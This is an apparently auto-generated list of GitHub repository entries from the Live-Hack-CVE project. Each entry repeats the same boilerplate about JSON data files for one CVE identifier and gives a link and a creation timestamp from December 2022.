**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3520](https://github.com/Live-Hack-CVE/CVE-2021-3520) create time: 2022-12-26T02:44:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22798](https://github.com/Live-Hack-CVE/CVE-2021-22798) create time: 2022-12-26T02:44:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40142](https://github.com/Live-Hack-CVE/CVE-2021-40142) create time: 2022-12-26T02:44:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46667 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46667](https://github.com/Live-Hack-CVE/CVE-2021-46667) create time: 2022-12-26T02:43:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45117](https://github.com/Live-Hack-CVE/CVE-2021-45117) create time: 2022-12-26T02:43:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42001](https://github.com/Live-Hack-CVE/CVE-2021-42001) create time: 2022-12-26T02:43:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41992](https://github.com/Live-Hack-CVE/CVE-2021-41992) create time: 2022-12-26T02:43:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0283](https://github.com/Live-Hack-CVE/CVE-2021-0283) create time: 2022-12-26T02:42:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0284](https://github.com/Live-Hack-CVE/CVE-2021-0284) create time: 2022-12-26T02:42:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30977 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30977](https://github.com/Live-Hack-CVE/CVE-2021-30977) create time: 2022-12-26T02:42:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3072 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3072](https://github.com/Live-Hack-CVE/CVE-2022-3072) create time: 2022-12-26T03:20:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36560](https://github.com/Live-Hack-CVE/CVE-2022-36560) create time: 2022-12-26T03:19:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36559](https://github.com/Live-Hack-CVE/CVE-2022-36559) create time: 2022-12-26T03:19:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36558](https://github.com/Live-Hack-CVE/CVE-2022-36558) create time: 2022-12-26T03:19:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36556](https://github.com/Live-Hack-CVE/CVE-2022-36556) create time: 2022-12-26T03:19:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36557](https://github.com/Live-Hack-CVE/CVE-2022-36557) create time: 2022-12-26T03:19:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36553 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36553](https://github.com/Live-Hack-CVE/CVE-2022-36553) create time: 2022-12-26T03:19:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2961 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2961](https://github.com/Live-Hack-CVE/CVE-2022-2961) create time: 2022-12-26T03:19:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1204](https://github.com/Live-Hack-CVE/CVE-2022-1204) create time: 2022-12-26T03:19:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38772](https://github.com/Live-Hack-CVE/CVE-2022-38772) create time: 2022-12-26T03:19:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34374 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34374](https://github.com/Live-Hack-CVE/CVE-2022-34374) create time: 2022-12-26T03:19:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26529 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26529](https://github.com/Live-Hack-CVE/CVE-2022-26529) create time: 2022-12-26T03:19:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26528 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26528](https://github.com/Live-Hack-CVE/CVE-2022-26528) create time: 2022-12-26T03:19:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26527](https://github.com/Live-Hack-CVE/CVE-2022-26527) create time: 2022-12-26T03:19:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31798](https://github.com/Live-Hack-CVE/CVE-2022-31798) create time: 2022-12-26T03:19:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31499](https://github.com/Live-Hack-CVE/CVE-2022-31499) create time: 2022-12-26T03:19:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31269](https://github.com/Live-Hack-CVE/CVE-2022-31269) create time: 2022-12-26T03:19:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36200 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36200](https://github.com/Live-Hack-CVE/CVE-2022-36200) create time: 2022-12-26T03:19:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36674 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36674](https://github.com/Live-Hack-CVE/CVE-2022-36674) create time: 2022-12-26T03:18:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36675 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36675](https://github.com/Live-Hack-CVE/CVE-2022-36675) create time: 2022-12-26T03:18:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36676 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36676](https://github.com/Live-Hack-CVE/CVE-2022-36676) create time: 2022-12-26T03:18:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38625 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38625](https://github.com/Live-Hack-CVE/CVE-2022-38625) create time: 2022-12-26T03:18:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36796 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36796](https://github.com/Live-Hack-CVE/CVE-2022-36796) create time: 2022-12-26T03:18:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36373 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36373](https://github.com/Live-Hack-CVE/CVE-2022-36373) create time: 2022-12-26T03:18:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36355 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36355](https://github.com/Live-Hack-CVE/CVE-2022-36355) create time: 2022-12-26T03:18:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2897](https://github.com/Live-Hack-CVE/CVE-2022-2897) create time: 2022-12-26T03:18:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36568 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36568](https://github.com/Live-Hack-CVE/CVE-2022-36568) create time: 2022-12-26T03:18:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37130](https://github.com/Live-Hack-CVE/CVE-2022-37130) create time: 2022-12-26T03:17:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36594](https://github.com/Live-Hack-CVE/CVE-2022-36594) create time: 2022-12-26T03:17:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36600](https://github.com/Live-Hack-CVE/CVE-2022-36600) create time: 2022-12-26T03:17:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2004 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2004](https://github.com/Live-Hack-CVE/CVE-2022-2004) create time: 2022-12-26T02:36:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2005 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2005](https://github.com/Live-Hack-CVE/CVE-2022-2005) create time: 2022-12-26T02:35:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2006 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2006](https://github.com/Live-Hack-CVE/CVE-2022-2006) create time: 2022-12-26T02:36:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-1191 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-1191](https://github.com/Live-Hack-CVE/CVE-2009-1191) create time: 2022-12-26T02:03:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-5250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-5250](https://github.com/Live-Hack-CVE/CVE-2010-5250) create time: 2022-12-26T02:38:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3581 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3581](https://github.com/Live-Hack-CVE/CVE-2014-3581) create time: 2022-12-26T02:03:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-8109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-8109](https://github.com/Live-Hack-CVE/CVE-2014-8109) create time: 2022-12-26T02:02:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-8743 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-8743](https://github.com/Live-Hack-CVE/CVE-2016-8743) create time: 2022-12-26T02:02:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5387](https://github.com/Live-Hack-CVE/CVE-2016-5387) create time: 2022-12-26T02:02:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20049](https://github.com/Live-Hack-CVE/CVE-2017-20049) create time: 2022-12-26T02:01:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20181](https://github.com/Live-Hack-CVE/CVE-2021-20181) create time: 2022-12-26T02:39:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-12121 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-12121](https://github.com/Live-Hack-CVE/CVE-2018-12121) create time: 2022-12-26T02:38:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-12123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-12123](https://github.com/Live-Hack-CVE/CVE-2018-12123) create time: 2022-12-26T02:37:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-12122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-12122](https://github.com/Live-Hack-CVE/CVE-2018-12122) create time: 2022-12-26T02:37:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-12120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-12120](https://github.com/Live-Hack-CVE/CVE-2018-12120) create time: 2022-12-26T02:37:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1312](https://github.com/Live-Hack-CVE/CVE-2018-1312) create time: 2022-12-26T02:02:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20196 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20196](https://github.com/Live-Hack-CVE/CVE-2021-20196) create time: 2022-12-26T02:39:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0197](https://github.com/Live-Hack-CVE/CVE-2019-0197) create time: 2022-12-26T02:02:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35536](https://github.com/Live-Hack-CVE/CVE-2020-35536) create time: 2022-12-26T02:39:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35537 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35537](https://github.com/Live-Hack-CVE/CVE-2020-35537) create time: 2022-12-26T02:36:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35535 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35535](https://github.com/Live-Hack-CVE/CVE-2020-35535) create time: 2022-12-26T02:03:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35534 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35534](https://github.com/Live-Hack-CVE/CVE-2020-35534) create time: 2022-12-26T02:02:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35525 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35525](https://github.com/Live-Hack-CVE/CVE-2020-35525) create time: 2022-12-26T02:02:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26938 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26938](https://github.com/Live-Hack-CVE/CVE-2020-26938) create time: 2022-12-26T02:01:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22669 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22669](https://github.com/Live-Hack-CVE/CVE-2020-22669) create time: 2022-12-26T01:58:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29338](https://github.com/Live-Hack-CVE/CVE-2021-29338) create time: 2022-12-26T02:05:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29672 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29672](https://github.com/Live-Hack-CVE/CVE-2021-29672) create time: 2022-12-26T02:05:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45027](https://github.com/Live-Hack-CVE/CVE-2021-45027) create time: 2022-12-26T02:04:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25657 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25657](https://github.com/Live-Hack-CVE/CVE-2021-25657) create time: 2022-12-26T02:01:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35133](https://github.com/Live-Hack-CVE/CVE-2021-35133) create time: 2022-12-26T02:00:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27693](https://github.com/Live-Hack-CVE/CVE-2021-27693) create time: 2022-12-26T01:58:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35134 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35134](https://github.com/Live-Hack-CVE/CVE-2021-35134) create time: 2022-12-26T01:56:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35135](https://github.com/Live-Hack-CVE/CVE-2021-35135) create time: 2022-12-26T01:55:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35132 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35132](https://github.com/Live-Hack-CVE/CVE-2021-35132) create time: 2022-12-26T01:55:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44718 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44718](https://github.com/Live-Hack-CVE/CVE-2021-44718) create time: 2022-12-26T01:55:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35113](https://github.com/Live-Hack-CVE/CVE-2021-35113) create time: 2022-12-26T01:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35122](https://github.com/Live-Hack-CVE/CVE-2021-35122) create time: 2022-12-26T01:55:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35097 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35097](https://github.com/Live-Hack-CVE/CVE-2021-35097) create time: 2022-12-26T01:55:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35108 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35108](https://github.com/Live-Hack-CVE/CVE-2021-35108) create time: 2022-12-26T01:54:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35109](https://github.com/Live-Hack-CVE/CVE-2021-35109) create time: 2022-12-26T01:54:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43080 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43080](https://github.com/Live-Hack-CVE/CVE-2021-43080) create time: 2022-12-26T01:54:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37172](https://github.com/Live-Hack-CVE/CVE-2022-37172) create time: 2022-12-26T02:38:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36203](https://github.com/Live-Hack-CVE/CVE-2022-36203) create time: 2022-12-26T02:38:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36202 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36202](https://github.com/Live-Hack-CVE/CVE-2022-36202) create time: 2022-12-26T02:38:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37173](https://github.com/Live-Hack-CVE/CVE-2022-37173) create time: 2022-12-26T02:38:14Z

